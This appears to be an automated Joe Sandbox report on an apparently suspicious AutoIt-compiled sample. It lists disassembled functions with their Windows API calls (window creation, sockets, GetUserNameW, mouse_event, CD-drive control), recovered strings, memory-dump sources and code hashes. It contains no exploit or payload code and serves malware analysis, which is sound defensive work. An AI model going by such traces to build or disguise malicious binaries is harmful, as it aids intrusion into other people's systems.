                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                              • String ID: *.*
                                                                                              • API String ID: 1972594611-438819550
                                                                                              • Opcode ID: 823f2416cec37c71a0f2091a8da64b6146f6d36256cd07d84185d60162eccb6d
                                                                                              • Instruction ID: f613bb9d8c87ac212451abed9fe8e5f4cdcbb781015f34a61550e57f56edb62a
                                                                                              • Opcode Fuzzy Hash: 823f2416cec37c71a0f2091a8da64b6146f6d36256cd07d84185d60162eccb6d
                                                                                              • Instruction Fuzzy Hash: 5A417D7194030AAFDF19DFA4DD49AEEBBB6FF15350F204056E805A22D1E7309E45CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DefDlgProcW.USER32(?,?), ref: 005922EE
                                                                                              • GetSysColor.USER32(0000000F), ref: 005923C3
                                                                                              • SetBkColor.GDI32(?,00000000), ref: 005923D6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$Proc
                                                                                              • String ID:
                                                                                              • API String ID: 929743424-0
                                                                                              • Opcode ID: 70675cca19b9fa6d4ad6d4768bff491bc7fd112a096d54fdbca3223c34327a63
                                                                                              • Instruction ID: 4e806a1c0edd31d9050e5360056198c5aec30af18df8f8e3f6aedcbfd0aac1c2
                                                                                              • Opcode Fuzzy Hash: 70675cca19b9fa6d4ad6d4768bff491bc7fd112a096d54fdbca3223c34327a63
                                                                                              • Instruction Fuzzy Hash: F581F6B0205854BAEF396A3D9C58EBF2D5EFB82300F19091BF142C5795CA598F01D677
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 006139AB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 006139D7
                                                                                                • Part of subcall function 006139AB: _wcslen.LIBCMT ref: 006139F8
                                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 006121BA
                                                                                              • WSAGetLastError.WSOCK32 ref: 006121E1
                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00612238
                                                                                              • WSAGetLastError.WSOCK32 ref: 00612243
                                                                                              • closesocket.WSOCK32(00000000), ref: 00612272
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                              • String ID:
                                                                                              • API String ID: 1601658205-0
                                                                                              • Opcode ID: 2de1fc207542226516f84af3bf7058b6b246d8f21faa9d42ddff75ea9713b496
                                                                                              • Instruction ID: e872a668d802c955d0d121fb24b5966dace7537111a62fd5e007ab7ba955ce6f
                                                                                              • Opcode Fuzzy Hash: 2de1fc207542226516f84af3bf7058b6b246d8f21faa9d42ddff75ea9713b496
                                                                                              • Instruction Fuzzy Hash: 2451D375A00601AFDB10EF24C89AF6E7BE5AB45714F088048F9159F3D3CA70ED42CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                              • String ID:
                                                                                              • API String ID: 292994002-0
                                                                                              • Opcode ID: 428c56ec2fff859493abd6ad56d515ea4fbbd72ef4bb463abcb7e54d4dfb5ede
                                                                                              • Instruction ID: a4c25027c87325eecca95a7c4347d630fc602a915fb1b0da13bc4008a82ec53a
                                                                                              • Opcode Fuzzy Hash: 428c56ec2fff859493abd6ad56d515ea4fbbd72ef4bb463abcb7e54d4dfb5ede
                                                                                              • Instruction Fuzzy Hash: FE21D631300A62AFD7209F15E864B967B96EF95314F188068E8499B352DB75DD42CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 005FEC19
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: mouse_event
                                                                                              • String ID: DOWN
                                                                                              • API String ID: 2434400541-711622031
                                                                                              • Opcode ID: e7ab29a0b453ac90f176cd2b5c4befe0b9e47c76e2d0447c3de080ff19b61b5d
                                                                                              • Instruction ID: 1c97b43429d9e8fb5c24e0e6f61871a8f69705a463b4d21e4347b781c8b019ea
                                                                                              • Opcode Fuzzy Hash: e7ab29a0b453ac90f176cd2b5c4befe0b9e47c76e2d0447c3de080ff19b61b5d
                                                                                              • Instruction Fuzzy Hash: 19E08C2629DB363CBA1421187C07DFA078CAF6A775B620246FD00E52D1ED882D8664A9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 005EE60A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameUser
                                                                                              • String ID: X64
                                                                                              • API String ID: 2645101109-893830106
                                                                                              • Opcode ID: df4ea934196d825b8e67f0111901185207141c1ab4d61ea93c6787642480da55
                                                                                              • Instruction ID: aa0c6195f7b94dae5d3f0fc5c78ccf2d248b6b6fa2c974f2bf5a2a69b23ee0bc
                                                                                              • Opcode Fuzzy Hash: df4ea934196d825b8e67f0111901185207141c1ab4d61ea93c6787642480da55
                                                                                              • Instruction Fuzzy Hash: E4D0C9B481111DEACFA0CF90EC88DDD777CBB08304F100551F106A2000D77095498B20
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DestroyWindow.USER32(00000000), ref: 0061309B
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 006131C7
                                                                                              • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00613206
                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00613216
                                                                                              • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 0061325D
                                                                                              • GetClientRect.USER32(00000000,?), ref: 00613269
                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 006132B2
                                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 006132C1
                                                                                              • GetStockObject.GDI32(00000011), ref: 006132D1
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 006132D5
                                                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 006132E5
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006132EE
                                                                                              • DeleteDC.GDI32(00000000), ref: 006132F7
                                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00613323
                                                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 0061333A
                                                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 0061337A
                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0061338E
                                                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 0061339F
                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 006133D4
                                                                                              • GetStockObject.GDI32(00000011), ref: 006133DF
                                                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 006133EA
                                                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 006133F4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                              • API String ID: 2910397461-517079104
                                                                                              • Opcode ID: bcfbdaa70297ced3d332c75e027337eb1d49c8831e2d979a4c4a3cdf4f6ab3ba
                                                                                              • Instruction ID: 89fffc1b167d8730ccfab4cd39dde6ec9d91a1e33a3abdf583032e68df400b73
                                                                                              • Opcode Fuzzy Hash: bcfbdaa70297ced3d332c75e027337eb1d49c8831e2d979a4c4a3cdf4f6ab3ba
                                                                                              • Instruction Fuzzy Hash: AAB14CB1A00615AFEB24DF68DC4AFAE7BBAFB44710F144114F915E7290C7B4AD41CB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00620C44
                                                                                              • _wcslen.LIBCMT ref: 00620C7E
                                                                                              • _wcslen.LIBCMT ref: 00620CE8
                                                                                              • _wcslen.LIBCMT ref: 00620D50
                                                                                              • _wcslen.LIBCMT ref: 00620DD4
                                                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00620E24
                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00620E63
                                                                                                • Part of subcall function 005AFD60: _wcslen.LIBCMT ref: 005AFD6B
                                                                                                • Part of subcall function 005F2ACF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 005F2AE8
                                                                                                • Part of subcall function 005F2ACF: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 005F2B1A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                              • API String ID: 1103490817-719923060
                                                                                              • Opcode ID: e3a73df1418e549dbd6ce967eea3c0bf93d26696b8d20b8a1922773425499403
                                                                                              • Instruction ID: 3b4245a582120442eafa7a1bc4fc21ffb2fa541323bc71e2edee5d83e8618a70
                                                                                              • Opcode Fuzzy Hash: e3a73df1418e549dbd6ce967eea3c0bf93d26696b8d20b8a1922773425499403
                                                                                              • Instruction Fuzzy Hash: 06E1DF31208A128FDB24DF24D5418AABBE6FFD9314B14495CF8969B7A2DB30ED46CB41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0059259A
                                                                                              • GetSystemMetrics.USER32(00000007), ref: 005925A2
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005925CD
                                                                                              • GetSystemMetrics.USER32(00000008), ref: 005925D5
                                                                                              • GetSystemMetrics.USER32(00000004), ref: 005925FA
                                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00592617
                                                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00592627
                                                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0059265A
                                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0059266E
                                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 0059268C
                                                                                              • GetStockObject.GDI32(00000011), ref: 005926A8
                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 005926B3
                                                                                                • Part of subcall function 005919CD: GetCursorPos.USER32(?), ref: 005919E1
                                                                                                • Part of subcall function 005919CD: ScreenToClient.USER32(00000000,?), ref: 005919FE
                                                                                                • Part of subcall function 005919CD: GetAsyncKeyState.USER32(00000001), ref: 00591A23
                                                                                                • Part of subcall function 005919CD: GetAsyncKeyState.USER32(00000002), ref: 00591A3D
                                                                                              • SetTimer.USER32(00000000,00000000,00000028,0059199C), ref: 005926DA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                              • String ID: AutoIt v3 GUI
                                                                                              • API String ID: 1458621304-248962490
                                                                                              • Opcode ID: b3846c73bcaa45ac4c05c8151ea96c445596b570e5aaa4d2a8e819b928a73cb0
                                                                                              • Instruction ID: 68328b81e25ad6b15b29575b6e398c4b8331e4eb05e13fe321e5a9016477ac05
                                                                                              • Opcode Fuzzy Hash: b3846c73bcaa45ac4c05c8151ea96c445596b570e5aaa4d2a8e819b928a73cb0
                                                                                              • Instruction Fuzzy Hash: 9BB18E7160060AAFDF24DFA8CC59BAD3BB6FB88314F11421AFA15AB290D774D941CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00628CB9
                                                                                              • _wcslen.LIBCMT ref: 00628CCD
                                                                                              • _wcslen.LIBCMT ref: 00628CF0
                                                                                              • _wcslen.LIBCMT ref: 00628D13
                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00628D51
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00626551), ref: 00628DAD
                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00628DE6
                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00628E29
                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00628E60
                                                                                              • FreeLibrary.KERNEL32(?), ref: 00628E6C
                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00628E7C
                                                                                              • DestroyIcon.USER32(?,?,?,?,?,00626551), ref: 00628E8B
                                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00628EA8
                                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00628EB4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                              • String ID: .dll$.exe$.icl$Qeb
                                                                                              • API String ID: 799131459-3805208156
                                                                                              • Opcode ID: 2d6155b46fcec5544f19ea0862d103e0f32f6947cd46347b559d16e400c7ad8f
                                                                                              • Instruction ID: 09800ef0814fa1dd9911dd91a4eea3b8ffb9925004700b20545ac190b836c4ae
                                                                                              • Opcode Fuzzy Hash: 2d6155b46fcec5544f19ea0862d103e0f32f6947cd46347b559d16e400c7ad8f
                                                                                              • Instruction Fuzzy Hash: 4861EF71500A25BEEB24DB64DC46BFE7BA9BF08710F108506F815D71D1DBB4AD45CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00621325
                                                                                              • _wcslen.LIBCMT ref: 00621360
                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006213B3
                                                                                              • _wcslen.LIBCMT ref: 006213E9
                                                                                              • _wcslen.LIBCMT ref: 00621465
                                                                                              • _wcslen.LIBCMT ref: 006214E0
                                                                                                • Part of subcall function 005AFD60: _wcslen.LIBCMT ref: 005AFD6B
                                                                                                • Part of subcall function 005F3478: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005F348A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                              • API String ID: 1103490817-4258414348
                                                                                              • Opcode ID: f40f2f5f17d05ca6575b5466a2ddeeb97db00b6841b09500040147a46b5ec077
                                                                                              • Instruction ID: 0684b6825a53a2d19a1619fecd332b9230e2e0a945f35b8e69fcdab722051e4b
                                                                                              • Opcode Fuzzy Hash: f40f2f5f17d05ca6575b5466a2ddeeb97db00b6841b09500040147a46b5ec077
                                                                                              • Instruction Fuzzy Hash: C1E19D31208B128FCB14EF24D45486ABBE6BFEA314B14495DF8969B762DB30ED45CF81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00604852
                                                                                              • _wcslen.LIBCMT ref: 0060485D
                                                                                              • _wcslen.LIBCMT ref: 006048B4
                                                                                              • _wcslen.LIBCMT ref: 006048F2
                                                                                              • GetDriveTypeW.KERNEL32(?), ref: 00604930
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00604978
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006049B3
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006049E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                              • API String ID: 1839972693-4113822522
                                                                                              • Opcode ID: 4ecacdbf64f8bb011566785335d31a8f3e899de1928db76c24a49d951e394c5e
                                                                                              • Instruction ID: 31267cae3b3e19edd9424fe198e7a294660c9f6ed3368fb1f2e7da7f1da849de
                                                                                              • Opcode Fuzzy Hash: 4ecacdbf64f8bb011566785335d31a8f3e899de1928db76c24a49d951e394c5e
                                                                                              • Instruction Fuzzy Hash: 5371E2716446029FCB24DF24C8809ABBBE6FF94754F00492CF995972A1EF30DD4ACB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadIconW.USER32(00000063), ref: 005F62BD
                                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 005F62CF
                                                                                              • SetWindowTextW.USER32(?,?), ref: 005F62E6
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 005F62FB
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 005F6301
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 005F6311
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 005F6317
                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 005F6338
                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 005F6352
                                                                                              • GetWindowRect.USER32(?,?), ref: 005F635B
                                                                                              • _wcslen.LIBCMT ref: 005F63C2
                                                                                              • SetWindowTextW.USER32(?,?), ref: 005F63FE
                                                                                              • GetDesktopWindow.USER32 ref: 005F6404
                                                                                              • GetWindowRect.USER32(00000000), ref: 005F640B
                                                                                              • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 005F6462
                                                                                              • GetClientRect.USER32(?,?), ref: 005F646F
                                                                                              • PostMessageW.USER32(?,00000005,00000000,?), ref: 005F6494
                                                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 005F64BE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 895679908-0
                                                                                              • Opcode ID: 6daa2b493ed072e9367011ec3da73fae374aac5c88069c4aedda138ad3dab632
                                                                                              • Instruction ID: fdb428af59493cf1358d823d4563a91fe82587ff6af5fba400a689828faee7db
